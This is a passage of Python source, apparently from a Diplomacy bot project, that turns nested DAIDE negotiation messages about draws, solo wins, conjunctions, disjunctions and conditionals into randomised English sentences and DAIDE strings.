self.powers = None
def formenglish(self): # type () -> str
"""
Creates an English expression about the draw in the context of a sender, recipients and desired tone.
:return: the English expression
:rtype: str
"""
powersgloss = ''
subjpowersgloxx = ''
if self.powers is not None:
powersgloss = helpers.listOfPowers(self.powers, self.utterance.frompower, self.utterance.topowers)
subjpowersgloss = helpers.listOfPowers(self.powers, self.utterance.frompower, self.utterance.topowers, case='Subjective')
if self.container.operator == 'PRP':
# (PRP (DRW
if self.container.container is None:
if self.powers is None:
self.english = 'I ' + random.choice(['propose', 'request', 'offer']) + ' we pursue a draw.'
else:
self.english = 'I ' + random.choice(['propose', 'request', 'offer']) + ' we pursue a draw between ' + powersgloss + '.'
# (YES (PRP (DRW
elif self.container.container.operator == 'YES':
if self.powers is None:
self.english = 'I ' + random.choice(['agree to', 'concur with']) + ' pursuing a draw.'
else:
self.english = 'I ' + random.choice(['agree to', 'concur with']) + ' pursuing a draw between ' + powersgloss + '.'
# (REJ (PRP (DRW
elif self.container.container.operator == 'REJ':
if self.powers is None:
self.english = 'I ' + random.choice(['reject', 'do not concur with', 'do not approve of', 'do not agree to']) + ' pursuing a draw.'
else:
self.english = 'I ' + random.choice(['reject', 'do not concur with', 'do not approve of', 'do not agree to']) + ' pursuing a draw between ' + powersgloss + '.'
# (CCL (PRP (DRW
elif self.container.container.operator == 'CCL':
if self.powers is None:
self.english = 'I wish to ' + random.choice(['cancel', 'retract', 'take back']) + ' my proposal of a draw.'
else:
self.english = 'I wish to ' + random.choice(['cancel', 'retract', 'take back']) + ' my proposal of a draw between ' + powersgloss + '.'
# (HUH (PRP (DRW
elif self.container.container.operator == 'HUH':
self.english = 'I do not understand your draw proposal.'
elif self.container.operator == 'NOT':
if self.container.container.operator == 'PRP':
# (PRP (NOT (DRW
if self.container.container.container is None:
if self.powers is None:
self.english = 'I ' + random.choice(['propose', 'request', 'offer']) + ' we do not pursue a draw.'
else:
self.english = 'I ' + random.choice(['propose', 'request', 'offer']) + ' we do not pursue a draw between ' + powersgloss + '.'
# (YES (PRP (NOT (DRW
elif self.container.container.container.operator == 'YES':
if self.powers is None:
self.english = 'I ' + random.choice(['agree that', 'concur that']) + ' we should not pursue a draw.'
else:
self.english = 'I ' + random.choice(['agree that', 'concur that']) + ' we should not pursue a draw between ' + powersgloss + '.'
# (REJ (PRP (NOT (DRW
elif self.container.container.container.operator == 'REJ':
if self.powers is None:
self.english = 'I ' + random.choice(['still think', 'nevertheless believe']) + ' we should pursue a draw.'
else:
self.english = 'I ' + random.choice(['still think', 'nevertheless believe']) + ' we should pursue a draw between ' + powersgloss + '.'
# (CCL (PRP (NOT (DRW
elif self.container.container.container.operator == 'CCL':
if self.powers is None:
self.english = 'I wish to ' + random.choice(['cancel', 'retract', 'take back']) + ' my proposal that we do not draw.'
else:
self.english = 'I wish to ' + random.choice(['cancel', 'retract', 'take back']) + ' my proposal that ' + subjpowersgloss + ' not pursue a draw.'
# (HUH (PRP (NOT (DRW
elif self.container.container.container.operator == 'HUH':
self.english = 'I do not understand your proposal about a draw.'
elif self.container.container.operator == 'FCT':
# (FCT (NOT (DRW
if self.container.container.container is None:
if self.powers is None:
self.english = 'I am not pursuing a draw.'
else:
self.english = subjpowersgloss + ' are not pursuing a draw.'
# (HUH (FCT (NOT (DRW
elif self.container.container.container.operator == 'HUH':
self.english = 'I do not understand your statement about a draw.'
elif self.container.operator == 'NAR':
if self.container.container.operator == 'PRP':
# (PRP (NAR (DRW
if self.container.container.container is None:
if self.powers is None:
self.english = 'It is ' + random.choice(['unclear', 'fuzzy', 'uncertain']) + ' that we should pursue a draw.'
else:
self.english = 'It is ' + random.choice(['unclear', 'fuzzy', 'uncertain']) + ' that ' + subjpowersgloss + ' should pursue a draw.'
# (YES (PRP (NAR (DRW
elif self.container.container.container.operator == 'YES':
if self.powers is None:
self.english = 'I ' + random.choice(['agree', 'concur']) + ' that it is ' + random.choice(['unclear', 'fuzzy', 'uncertain']) + ' that we should pursue a draw.'
else:
self.english = 'I ' + random.choice(['agree', 'concur']) + ' that it is ' + random.choice(['unclear', 'fuzzy', 'uncertain']) + ' that ' + subjpowersgloss + ' should pursue a draw.'
# (REJ (PRP (NAR (DRW
elif self.container.container.container.operator == 'REJ':
if self.powers is None:
self.english = 'No, I ' + random.choice(['think', 'believe']) + ' that we should pursue a draw.'
else:
self.english = 'No, I ' + random.choice(['think', 'believe']) + ' that ' + subjpowersgloss + ' should pursue a draw.'
# (CCL (PRP (NAR (DRW
elif self.container.container.container.operator == 'CCL':
if self.powers is None:
self.english = 'I wish to ' + random.choice(['cancel', 'retract', 'take back']) + ' my proposal regarding a draw.'
else:
self.english = 'I wish to ' + random.choice(['cancel', 'retract', 'take back']) + ' my proposal regarding a draw between ' + powersgloss + '.'
# (HUH (PRP (NAR (DRW
elif self.container.container.container.operator == 'HUH':
self.english = 'I do not understand your proposal about a draw.'
elif self.container.container.operator == 'FCT':
# (FCT (NAR (DRW
if self.container.container.container is None:
if self.powers is None:
self.english = 'It is unclear if we are in a good draw position.'
else:
self.english = 'It is unclear if ' + subjpowersgloss + ' are in a good draw position.'
# (HUH (FCT (NAR (DRW
elif self.container.container.container.operator == 'HUH':
self.english = 'I do not understand your statement about a draw.'
elif self.container.operator == 'FCT':
# (FCT (DRW
if self.container.container is None:
if self.powers is None:
self.english = 'We are in a good draw position.'
else:
self.english = subjpowersgloss + ' are in a good draw position.'
# (HUH (FCT (DRW
elif self.container.container.operator == 'HUH':
self.english = 'I do not understand your statement about a draw.'
else:
self.english = self.formsimpleenglish()
return self.english
def formsimpleenglish(self): # type () -> str
"""
Creates an English expression about the DMZ in the context of a sender, recipients and desired tone.
:return: the simple English expression
:rtype: str
"""
if self.powers is None:
self.simpleenglish = 'a draw'
else:
self.simpleenglish = 'a draw between ' + helpers.listOfPowers(self.powers, self.utterance.frompower, self.utterance.topowers)
return self.simpleenglish
def formDAIDE(self): # type () -> str
"""
Create a DAIDE representation of this Message
:return: the DAIDE message
:rtype: str
"""
if self.powers is None:
return 'DRW'
else:
return 'DRW (' + ' '.join(self.powers) + ')'
class PressSolo(PressMessage):
""" The game-related content of a solo win. """
def __init__(self, utterance, container, thelists): # type: (PressUtterance, PressMessage, []) -> None
"""
Initialize the message with an utterance
:param utterance: the press utterance that this message is within the content for
:type utterance: PressUtterance
:param container: the press message that contains this one
:type container: PressMessage
:param thelists: the parsed, nested DAIDE statement
:type thelists: []
"""
super().__init__(utterance, container)
if thelists is None or len(thelists) == 0:
self.operator = 'SLO'
if random.choice([True, True, False]):
self.winner = [utterance.frompower]
else:
self.winner = [random.choice(helpers.powerlist)]
elif len(thelists) == 2:
self.operator = thelists[0]
self.winner = thelists[1]
def formenglish(self): # type () -> str
"""
Creates an English expression about the solo win in the context of a sender, recipients and desired tone.
:return: the English expression
:rtype: str
"""
winnergloss = helpers.listOfPowers(self.winner, self.utterance.frompower, self.utterance.topowers)
if self.container.operator == 'PRP':
# (PRP (SLO
if self.container.container is None:
if winnergloss == 'me':
self.english = 'I am ' + random.choice(['in a good position for a solo win', 'going for a solo win', 'not catchable - watch my solo win', 'just a matter of turns away from winning']) + '.'
elif winnergloss == 'you':
self.english = 'You are ' + random.choice(['in a good position for a solo win', 'going for a solo win', 'not catchable - go for a solo win', 'just a matter of turns away from winning']) + '.'
else:
self.english = winnergloss + ' is ' + random.choice(['in a good position for a solo win', 'going for a solo win', 'not catchable - going for a solo win', 'just a matter of turns away from winning']) + '.'
# (YES (PRP (SLO
elif self.container.container.operator == 'YES':
self.english = 'I ' + random.choice(['agree to', 'concur with']) + ' the likelihood of a solo win by ' + winnergloss + '.'
# (REJ (PRP (SLO
elif self.container.container.operator == 'REJ':
self.english = 'I ' + random.choice(['disagree with', 'reject']) + ' the likelihood of a solo win by ' + winnergloss + '.'
# (CCL (PRP (SLO
elif self.container.container.operator == 'CCL':
self.english = 'I wish to ' + random.choice(['cancel', 'retract', 'take back']) + ' my proposal of a solo win by ' + winnergloss + '.'
# (HUH (PRP (SLO
elif self.container.container.operator == 'HUH':
self.english = 'I do not understand your solo win proposal.'
elif self.container.operator == 'NOT':
if self.container.container.operator == 'PRP':
# (PRP (NOT (SLO
if self.container.container.container is None:
if winnergloss == 'me':
self.english = 'I am ' + random.choice(['not in a good position for a solo win', 'not going for a solo win', 'not uncatchable - no solo win yet', 'still a ways from winning']) + '.'
elif winnergloss == 'you':
self.english = 'You are ' + random.choice(['not in a good position for a solo win', 'not going for a solo win', 'not uncatchable - no solo win yet', 'still a ways from winning']) + '.'
else:
self.english = winnergloss + ' is ' + random.choice(['not in a good position for a solo win', 'not going for a solo win', 'not uncatchable - no solo win yet', 'still a ways from winning']) + '.'
# (YES (PRP (NOT (SLO
elif self.container.container.container.operator == 'YES':
if winnergloss == 'me':
self.english = 'I agree I am ' + random.choice(['not in a good position for a solo win', 'not going for a solo win', 'not uncatchable - no solo win yet', 'still a ways from winning']) + '.'
elif winnergloss == 'you':
self.english = 'I agree you are ' + random.choice(['not in a good position for a solo win', 'not going for a solo win', 'not uncatchable - no solo win yet', 'still a ways from winning']) + '.'
else:
self.english = 'I agree ' + winnergloss + ' is ' + random.choice(['not in a good position for a solo win', 'not going for a solo win', 'not uncatchable - no solo win yet', 'still a ways from winning']) + '.'
# (REJ (PRP (NOT (SLO
elif self.container.container.container.operator == 'REJ':
if winnergloss == 'me':
self.english = 'I think I am ' + random.choice(['closer to a win than you think', 'going for a solo win anyway', 'nevertheless uncatchable', 'quite close to winning']) + '.'
elif winnergloss == 'you':
self.english = 'I think you are ' + random.choice(['closer to a win than you think', 'going for a solo win anyway', 'nevertheless uncatchable', 'quite close to winning']) + '.'
else:
self.english = 'I think ' + winnergloss + ' is ' + random.choice(['closer to a win than you think', 'going for a solo win anyway', 'nevertheless uncatchable', 'quite close to winning']) + '.'
# (CCL (PRP (NOT (SLO
elif self.container.container.container.operator == 'CCL':
self.english = 'I wish to ' + random.choice(['cancel', 'retract', 'take back']) + ' my proposal that a solo win is not in the cards for ' + winnergloss + '.'
# (HUH (PRP (NOT (SLO
elif self.container.container.container.operator == 'HUH':
self.english = 'I do not understand your proposal about a solo win.'
elif self.container.container.operator == 'FCT':
# (FCT (NOT (SLO
if self.container.container.container is None:
self.english = winnergloss + ' is not pursuing a solo win.'
# (HUH (FCT (NOT (SLO
elif self.container.container.container.operator == 'HUH':
self.english = 'I do not understand your statement about a solo win.'
elif self.container.operator == 'NAR':
if self.container.container.operator == 'PRP':
# (PRP (NAR (SLO
if self.container.container.container is None:
if winnergloss == 'me':
self.english = 'I am ' + random.choice(['unsure about a solo win', 'on the fence about a solo win', 'not uncatchable - no solo win yet', 'still a ways from winning']) + '.'
elif winnergloss == 'you':
self.english = 'You are ' + random.choice(['unsure about a solo win', 'on the fence about a solo win', 'not uncatchable - no solo win yet', 'still a ways from winning']) + '.'
else:
self.english = winnergloss + ' is ' + random.choice(['unsure about a solo win', 'on the fence about a solo win', 'not uncatchable - no solo win yet', 'still a ways from winning']) + '.'
# (YES (PRP (NAR (SLO
elif self.container.container.container.operator == 'YES':
if winnergloss == 'me':
self.english = 'I agree I am ' + random.choice(['unsure about a solo win', 'on the fence about a solo win', 'not uncatchable - no solo win yet', 'still a ways from winning']) + '.'
elif winnergloss == 'you':
self.english = 'I agree you are ' + random.choice(['unsure about a solo win', 'on the fence about a solo win', 'not uncatchable - no solo win yet', 'still a ways from winning']) + '.'
else:
self.english = 'I agree ' + winnergloss + ' is ' + random.choice(['unsure about a solo win', 'on the fence about a solo win', 'not uncatchable - no solo win yet', 'still a ways from winning']) + '.'
# (REJ (PRP (NAR (SLO
elif self.container.container.container.operator == 'REJ':
if winnergloss == 'me':
self.english = 'I disagree - I am ' + random.choice(['pretty sure about a solo win', 'close to a solo win', 'uncatchable - solo win not far away', 'just a few moves from winning']) + '.'
elif winnergloss == 'you':
self.english = 'I disagree - you are ' + random.choice(['pretty sure about a solo win', 'close to a solo win', 'uncatchable - solo win not far away', 'just a few moves from winning']) + '.'
else:
self.english = 'I disagree - ' + winnergloss + ' is ' + random.choice(['pretty sure for a solo win', 'close to a solo win', 'uncatchable - solo win not far away', 'just a few moves from winning']) + '.'
# (CCL (PRP (NAR (SLO
elif self.container.container.container.operator == 'CCL':
self.english = 'I wish to ' + random.choice(['cancel', 'retract', 'take back']) + ' my proposal that ' + \
winnergloss + ' is not clearly capable of a solo win.'
# (HUH (PRP (NAR (SLO
elif self.container.container.container.operator == 'HUH':
self.english = 'I do not understand your proposal about a solo win.'
elif self.container.container.operator == 'FCT':
# (FCT (NAR (SLO
if self.container.container.container is None:
if winnergloss == 'me':
self.english = 'It is unclear if I am ' + random.choice(['pretty sure for a solo win', 'close to a solo win', 'uncatchable', 'just a few moves from winning']) + '.'
elif winnergloss == 'you':
self.english = 'It is unlcear if you are ' + random.choice(['pretty sure for a solo win', 'close to a solo win', 'uncatchable', 'just a few moves from winning']) + '.'
else:
self.english = 'I it is unlcear if ' + winnergloss + ' is ' + random.choice(['pretty sure for a solo win', 'close to a solo win', 'uncatchable', 'just a few moves from winning']) + '.'
# (HUH (FCT (NAR (SLO
elif self.container.container.container.operator == 'HUH':
self.english = 'I do not understand your statement about a solo win.'
elif self.container.operator == 'FCT':
# (FCT (SLO
if self.container.container is None:
if winnergloss == 'me':
self.english = 'I am ' + random.choice(['pretty sure for a solo win', 'close to a solo win', 'uncatchable', 'just a few moves from winning']) + '.'
elif winnergloss == 'you':
self.english = 'You are ' + random.choice(['pretty sure for a solo win', 'close to a solo win', 'uncatchable', 'just a few moves from winning']) + '.'
else:
self.english = winnergloss + ' is ' + random.choice(['pretty sure for a solo win', 'close to a solo win', 'uncatchable', 'just a few moves from winning']) + '.'
# (HUH (FCT (SLO
elif self.container.container.operator == 'HUH':
self.english = 'I do not understand your statement about a solo win.'
else:
self.english = self.formsimpleenglish()
return self.english
def formsimpleenglish(self): # type () -> str
"""
Creates an English expression about the DMZ in the context of a sender, recipients and desired tone.
:return: the simple English expression
:rtype: str
"""
self.simpleenglish = 'a solo win by ' + helpers.listOfPowers(self.winner, self.utterance.frompower, self.utterance.topowers)
return self.simpleenglish
def formDAIDE(self): # type () -> str
"""
Create a DAIDE representation of this Message
:return: the DAIDE message
:rtype: str
"""
return 'SLO (' + self.winner[0] + ')'
class PressAnd(PressMessage):
""" The game-related content of a conjunction. """
def __init__(self, utterance, container, thelists): # type: (PressUtterance, PressMessage, []) -> None
"""
Initialize the message with an utterance
:param utterance: the press utterance that this message is within the content for
:type utterance: PressUtterance
:param container: the press message that contains this one
:type container: PressMessage
:param thelists: the parsed, nested DAIDE statement
:type thelists: []
"""
super().__init__(utterance, container)
self.conjuncts = []
if thelists is None or len(thelists) == 0:
self.operator = 'AND'
for cconj in range(0, random.randint(2, 4)):
conjword = random.choice(['PCE', 'ALY', 'DMZ', 'SLO', 'DRW', 'XDO', 'NOT', 'NAR'])
self.conjuncts.append(randomFactory(utterance, self, conjword))
elif len(thelists) > 1:
self.operator = thelists[0]
for cConj in range(1, len(thelists)):
self.conjuncts.append(messageFactory(utterance, self, thelists[cConj]))
def formenglish(self): # type () -> str
"""
Creates an English expression about the conjunction in the context of a sender, recipients and desired tone.
:return: the English expression
:rtype: str
"""
if self.container.operator == 'PRP':
# (PRP (AND
if self.container.container is None:
self.english = 'I ' + random.choice(['propose', 'request', 'offer']) + \
' all of the following: ' + self.formsimpleenglish()
# (YES (PRP (AND
elif self.container.container.operator == 'YES':
self.english = 'I ' + random.choice(['agree to', 'concur with', 'will accept']) + ' all of the following: ' + self.formsimpleenglish()
# (REJ (PRP (AND
elif self.container.container.operator == 'REJ':
self.english = 'I ' + random.choice(['reject', 'do not concur with', 'do not approve of', 'do not accept']) + \
' all of the following: ' + self.formsimpleenglish()
# (CCL (PRP (AND
elif self.container.container.operator == 'CCL':
self.english = 'I wish to ' + random.choice(['cancel', 'retract', 'take back']) + ' my proposal of the following: ' + self.formsimpleenglish()
# (HUH (PRP (AND
elif self.container.container.operator == 'HUH':
self.english = 'I do not understand your list of proposals.'
elif self.container.operator == 'NOT':
if self.container.container.operator == 'PRP':
# (PRP (NOT (AND
if self.container.container.container is None:
self.english = 'I do not ' + random.choice(['want', 'desire', 'support']) + ' the following: ' + self.formsimpleenglish()
# (YES (PRP (NOT (AND
elif self.container.container.container.operator == 'YES':
self.english = 'I ' + random.choice(['agree', 'concur']) + ' that none of the following are desirable: ' + self.formsimpleenglish()
# (REJ (PRP (NOT (AND
elif self.container.container.container.operator == 'REJ':
self.english = 'I ' + random.choice(['disagree', 'reject']) + ' that none of the following are desirable: ' + self.formsimpleenglish()
# (CCL (PRP (NOT (AND
elif self.container.container.container.operator == 'CCL':
self.english = 'I wish to ' + random.choice(['cancel', 'retract', 'take back']) + ' my proposal rejecting the following: ' + self.formsimpleenglish()
# (HUH (PRP (NOT (AND
elif self.container.container.container.operator == 'HUH':
self.english = 'I do not understand your list of proposals.'
elif self.container.container.operator == 'FCT':
# (FCT (NOT (AND
if self.container.container.container is None:
self.english = 'The following conditions are not true: ' + self.formsimpleenglish()
# (HUH (FCT (NOT (AND
elif self.container.container.container.operator == 'HUH':
self.english = 'I do not understand your list of statements.'
elif self.container.operator == 'NAR':
if self.container.container.operator == 'PRP':
# (PRP (NAR (AND
if self.container.container.container is None:
self.english = 'I ' + random.choice(['am ambivalent about', 'am unsure about', 'am not convinced of']) + ' the following: ' + self.formsimpleenglish()
# (YES (PRP (NAR (AND
elif self.container.container.container.operator == 'YES':
self.english = 'I am also ' + random.choice(['ambivalent about', 'unsure about', 'not convinced of']) + ' the following: ' + self.formsimpleenglish()
# (REJ (PRP (NAR (AND
elif self.container.container.container.operator == 'REJ':
self.english = 'No, I ' + random.choice(['reject', 'oppose']) + ' your ambivalence about: ' + self.formsimpleenglish()
# (CCL (PRP (NAR (AND
elif self.container.container.container.operator == 'CCL':
self.english = 'I wish to ' + random.choice(['cancel', 'retract', 'take back']) + ' my ambivalence about the following: ' + self.formsimpleenglish()
# (HUH (PRP (NAR (AND
elif self.container.container.container.operator == 'HUH':
self.english = 'I do not understand your list of proposals.'
elif self.container.container.operator == 'FCT':
# (FCT (NAR (AND
if self.container.container.container is None:
self.english = 'It is unclear if the following are true: ' + self.formsimpleenglish()
# (HUH (FCT (NAR (AND
elif self.container.container.container.operator == 'HUH':
self.english = 'I do not understand your list of statements.'
elif self.container.operator == 'FCT':
# (FCT (AND
if self.container.container is None:
self.english = 'The following are all true: ' + self.formsimpleenglish()
# (HUH (FCT (AND
elif self.container.container.operator == 'HUH':
self.english = 'I do not understand your list of statements.'
else:
self.english = self.formsimpleenglish()
return self.english
def formsimpleenglish(self): # type () -> str
"""
Creates an English expression about the conjunction in the context of a sender, recipients and desired tone.
:return: the English expression
:rtype: str
"""
self.simpleenglish = '<br><ul>'
for curConj in self.conjuncts:
self.simpleenglish += '<li>' + helpers.initcap(curConj.formsimpleenglish()) + '</li>'
self.simpleenglish += '</ul>'
return self.simpleenglish
def formDAIDE(self): # type () -> str
"""
Create a DAIDE representation of this Message
:return: the DAIDE message
:rtype: str
"""
return 'AND ' + ' '.join(['(' + curconj.formDAIDE() + ')' for curconj in self.conjuncts])
class PressOr(PressMessage):
""" The game-related content of a disjunction. """
def __init__(self, utterance, container, thelists): # type: (PressUtterance, PressMessage, []) -> None
"""
Initialize the message with an utterance
:param utterance: the press utterance that this message is within the content for
:type utterance: PressUtterance
:param container: the press message that contains this one
:type container: PressMessage
:param thelists: the parsed, nested DAIDE statement
:type thelists: []
"""
super().__init__(utterance, container)
self.disjuncts = []
if thelists is None or len(thelists) == 0:
self.operator = 'AND'
for cdisj in range(0, random.randint(2, 4)):
disjword = random.choice(['PCE', 'ALY', 'DMZ', 'SLO', 'DRW', 'XDO', 'NOT', 'NAR'])
self.disjuncts.append(randomFactory(utterance, self, disjword))
elif len(thelists) > 1:
self.operator = thelists[0]
for cDisj in range(1, len(thelists)):
self.disjuncts.append(messageFactory(utterance, self, thelists[cDisj]))
def formenglish(self): # type () -> str
"""
Creates an English expression about the disjunction in the context of a sender, recipients and desired tone.
:return: the English expression
:rtype: str
"""
if self.container.operator == 'PRP':
# (PRP (ORR
if self.container.container is None:
self.english = 'I ' + random.choice(['propose', 'request', 'offer']) + \
' that you choose one of the following options: ' + self.formsimpleenglish()
# (YES (PRP (ORR
elif self.container.container.operator == 'YES':
self.english = 'I ' + random.choice(['agree to', 'concur with', 'will accept']) + ' one of the following: ' + self.formsimpleenglish()
# (REJ (PRP (ORR
elif self.container.container.operator == 'REJ':
self.english = 'I ' + random.choice(['reject', 'do not concur with', 'do not approve of', 'do not accept']) + \
' any of the following: ' + self.formsimpleenglish()
# (CCL (PRP (ORR
elif self.container.container.operator == 'CCL':
self.english = 'I wish to ' + random.choice(['cancel', 'retract', 'take back']) + ' my proposal of a choice from the following: ' + self.formsimpleenglish()
# (HUH (PRP (ORR
elif self.container.container.operator == 'HUH':
self.english = 'I do not understand your list of proposals.'
elif self.container.operator == 'NOT':
if self.container.container.operator == 'PRP':
# (PRP (NOT (ORR
if self.container.container.container is None:
self.english = 'I do not ' + random.choice(['want', 'desire', 'support']) + ' any of the following: ' + self.formsimpleenglish()
# (YES (PRP (NOT (ORR
elif self.container.container.container.operator == 'YES':
self.english = 'I ' + random.choice(['agree', 'concur']) + ' that none of the following are desirable: ' + self.formsimpleenglish()
# (REJ (PRP (NOT (ORR
elif self.container.container.container.operator == 'REJ':
self.english = 'I ' + random.choice(['disagree', 'reject']) + ' that none of the following are desirable: ' + self.formsimpleenglish()
# (CCL (PRP (NOT (ORR
elif self.container.container.container.operator == 'CCL':
self.english = 'I wish to ' + random.choice(['cancel', 'retract', 'take back']) + ' my proposal rejecting the following: ' + self.formsimpleenglish()
# (HUH (PRP (NOT (ORR
elif self.container.container.container.operator == 'HUH':
self.english = 'I do not understand your list of proposals.'
elif self.container.container.operator == 'FCT':
# (FCT (NOT (ORR
if self.container.container.container is None:
self.english = 'One of the following conditions are not true: ' + self.formsimpleenglish()
# (HUH (FCT (NOT (ORR
elif self.container.container.container.operator == 'HUH':
self.english = 'I do not understand your list of statements.'
elif self.container.operator == 'NAR':
if self.container.container.operator == 'PRP':
# (PRP (NAR (ORR
if self.container.container.container is None:
self.english = 'I ' + random.choice(['am ambivalent about', 'am unsure about', 'am not convinced of']) + ' one of the following: ' + self.formsimpleenglish()
# (YES (PRP (NAR (ORR
elif self.container.container.container.operator == 'YES':
self.english = 'I am also ' + random.choice(['ambivalent about', 'unsure about', 'not convinced of']) + ' one the following: ' + self.formsimpleenglish()
# (REJ (PRP (NAR (ORR
elif self.container.container.container.operator == 'REJ':
self.english = 'No, I ' + random.choice(['reject', 'oppose']) + ' your ambivalence about any of the following: ' + self.formsimpleenglish()
# (CCL (PRP (NAR (ORR
elif self.container.container.container.operator == 'CCL':
self.english = 'I wish to ' + random.choice(['cancel', 'retract', 'take back']) + ' my ambivalence about one of the following: ' + self.formsimpleenglish()
# (HUH (PRP (NAR (ORR
elif self.container.container.container.operator == 'HUH':
self.english = 'I do not understand your list of proposals.'
elif self.container.container.operator == 'FCT':
# (FCT (NAR (ORR
if self.container.container.container is None:
self.english = 'It is unclear if each of the following are true: ' + self.formsimpleenglish()
# (HUH (FCT (NAR (ORR
elif self.container.container.container.operator == 'HUH':
self.english = 'I do not understand your list of statements.'
elif self.container.operator == 'FCT':
# (FCT (ORR
if self.container.container is None:
self.english = 'One of the following is true: ' + self.formsimpleenglish()
# (HUH (FCT (ORR
elif self.container.container.operator == 'HUH':
self.english = 'I do not understand your list of statements.'
else:
self.english = self.formsimpleenglish()
return self.english
def formsimpleenglish(self): # type () -> str
"""
Creates an English expression about the disjunction in the context of a sender, recipients and desired tone.
:return: the English expression
:rtype: str
"""
self.simpleenglish = '<br><ul>'
for curDisj in self.disjuncts:
self.simpleenglish += '<li>' + helpers.initcap(curDisj.formsimpleenglish()) + '</li>'
self.simpleenglish += '</ul>'
return self.simpleenglish
def formDAIDE(self): # type () -> str
"""
Create a DAIDE representation of this Message
:return: the DAIDE message
:rtype: str
"""
return 'ORR ' + ' '.join(['(' + curdisj.formDAIDE() + ')' for curdisj in self.disjuncts])
class PressIf(PressMessage):
""" The game-related content of a conditional. """
def __init__(self, utterance, container, thelists): # type: (PressUtterance, PressMessage, []) -> None
"""
Initialize the message with an utterance
:param utterance: the press utterance that this message is within the content for
:type utterance: PressUtterance
:param container: the press message that contains this one
:type container: PressMessage
:param thelists: the parsed, nested DAIDE statement
:type thelists: []
"""
super().__init__(utterance, container)
if thelists is None or len(thelists) == 0:
self.operator = 'AND'
anteword = random.choice(['PCE', 'ALY', 'DMZ', 'SLO', 'DRW', 'XDO', 'NOT', 'NAR'])
self.antecedent = randomFactory(utterance, self, anteword)
consword = random.choice(['PCE', 'ALY', 'DMZ', 'SLO', 'DRW', 'XDO', 'NOT', 'NAR'])
self.consequent = randomFactory(utterance, self, consword)
self.alternative = None
if random.choice([True, False]):
altword = random.choice(['PCE', 'ALY', 'DMZ', 'SLO', 'DRW', 'XDO', 'NOT', 'NAR'])
self.alternative = randomFactory(utterance, self, altword)
elif len(thelists) == 3:
self.operator = thelists[0]
self.antecedent = messageFactory(utterance, self, thelists[1])
self.consequent = messageFactory(utterance, self, thelists[2])
self.alternative = None
elif len(thelists) == 5:
self.operator = thelists[0]
self.antecedent = messageFactory(utterance, self, thelists[1])
self.consequent = messageFactory(utterance, self, thelists[2])
self.alternative = messageFactory(utterance, self, thelists[4])
def formenglish(self): # type () -> str
"""
Creates an English expression about the conditional in the context of a sender, recipients and desired tone.
:return: the English expression
:rtype: str
"""
if self.container.operator == 'PRP':
# (PRP (IFF
if self.container.container is None:
if random.choice([True, False]):
self.english = 'Here\'s my ' + random.choice(['proposal', 'proposed deal', 'offer']) + \
': if ' + self.antecedent.formsimpleenglish() + ', then ' + self.consequent.formsimpleenglish() + '.'
else:
self.english = 'Would you consider ' + self.consequent.formsimpleenglish() + ' if ' + self.antecedent.formsimpleenglish() + '?'
if self.alternative is not None:
self.english += ' If not this, then perhaps ' + self.antecedent.formsimpleenglish() + '?'
# (YES (PRP (IFF
elif self.container.container.operator == 'YES':
self.english = 'I ' + random.choice(['agree to', 'concur with', 'will accept']) + ' ' + self.antecedent.formsimpleenglish() + \
' and when it\'s done, I will execute the following: ' + self.consequent.formsimpleenglish()
# (REJ (PRP (IFF
elif self.container.container.operator == 'REJ':
self.english = 'I ' + random.choice(['reject', 'do not concur with', 'do not approve of', 'do not accept']) + \
' the condition that ' + self.antecedent.formsimpleenglish() + ' should lead to ' + self.consequent.formsimpleenglish()
# (CCL (PRP (IFF
elif self.container.container.operator == 'CCL':
self.english = 'I wish to ' + random.choice(['cancel', 'retract', 'take back']) + ' my proposal of ' + \
self.antecedent.formsimpleenglish() + ' for ' + self.consequent.formsimpleenglish()
# (HUH (PRP (IFF
elif self.container.container.operator == 'HUH':
self.english = 'I do not understand your quid pro quo.'
elif self.container.operator == 'NOT':
if self.container.container.operator == 'PRP':
# (PRP (NOT (IFF
if self.container.container.container is None:
self.english = 'I do not ' + random.choice(['want', 'desire', 'support']) + ' the following trade: ' + \
self.antecedent.formsimpleenglish() + ' for ' + self.consequent.formsimpleenglish()
# (YES (PRP (NOT (IFF
elif self.container.container.container.operator == 'YES':
self.english = 'I ' + random.choice(['agree', 'concur']) + ' that the following trade is not desirable: ' + \
self.antecedent.formsimpleenglish() + ' for ' + self.consequent.formsimpleenglish()
# (REJ (PRP (NOT (IFF
elif self.container.container.container.operator == 'REJ':
self.english = 'I still want ' + self.consequent.formsimpleenglish() + ' whether or not you want ' + self.antecedent.formsimpleenglish()
# (CCL (PRP (NOT (IFF
elif self.container.container.container.operator == 'CCL':
self.english = 'I wish to ' + random.choice(['cancel', 'retract', 'take back']) + ' my proposal rejecting ' + \
self.antecedent.formsimpleenglish() + ' for ' + self.consequent.formsimpleenglish()
# (HUH (PRP (NOT (IFF
elif self.container.container.container.operator == 'HUH':
self.english = 'I do not understand your trade offer.'
elif self.container.container.operator == 'FCT':
# (FCT (NOT (IFF
if self.container.container.container is None:
self.english = 'It is not the case that if ' + self.antecedent.formsimpleenglish() + ', then ' + self.consequent.formsimpleenglish()
# (HUH (FCT (NOT (IFF
elif self.container.container.container.operator == 'HUH':
self.english = 'I do not understand your statement about the trade.'
elif self.container.operator == 'NAR':
if self.container.container.operator == 'PRP':
# (PRP (NAR (IFF
if self.container.container.container is None:
self.english = 'If ' + self.antecedent.formsimpleenglish() + ', then maybe ' + self.consequent.formsimpleenglish()
# (YES (PRP (NAR (IFF
elif self.container.container.container.operator == 'YES':
self.english = 'I agree, it may be that if ' + self.antecedent.formsimpleenglish() + ', then maybe ' + self.consequent.formsimpleenglish()
# (REJ (PRP (NAR (IFF
elif self.container.container.container.operator == 'REJ':
self.english = 'I disagree that if ' + self.antecedent.formsimpleenglish() + ', then maybe ' + self.consequent.formsimpleenglish()
# (CCL (PRP (NAR (IFF
elif self.container.container.container.operator == 'CCL':
self.english = 'I wish to ' + random.choice(['cancel', 'retract', 'take back']) + ' my proposal of ' + \
self.antecedent.formsimpleenglish() + ' for ' + self.consequent.formsimpleenglish()
# (HUH (PRP (NAR (IFF
elif self.container.container.container.operator == 'HUH':
self.english = 'I do not understand your proposal of a quid pro quo.'
elif self.container.container.operator == 'FCT':
# (FCT (NAR (IFF
if self.container.container.container is None:
self.english = 'It is unclear that if ' + self.antecedent.formsimpleenglish() + ', then ' + self.consequent.formsimpleenglish()
# (HUH (FCT (NAR (IFF
elif self.container.container.container.operator == 'HUH':
self.english = 'I do not understand your statement about a trade.'
elif self.container.operator == 'FCT':
# (FCT (IFF
if self.container.container is None:
